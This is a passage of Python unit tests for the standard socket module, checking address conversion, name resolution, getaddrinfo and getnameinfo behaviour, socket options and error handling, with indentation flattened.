# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by services that have both a tcp and a udp
# entry, at least on modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as it has a
# non-standard port/protocol entry that breaks this test's assumptions
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it is reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# A freshly created socket should start with reuse == 0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for an OS X platform bug that caused a segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care about here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or is undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Mac OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or is undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
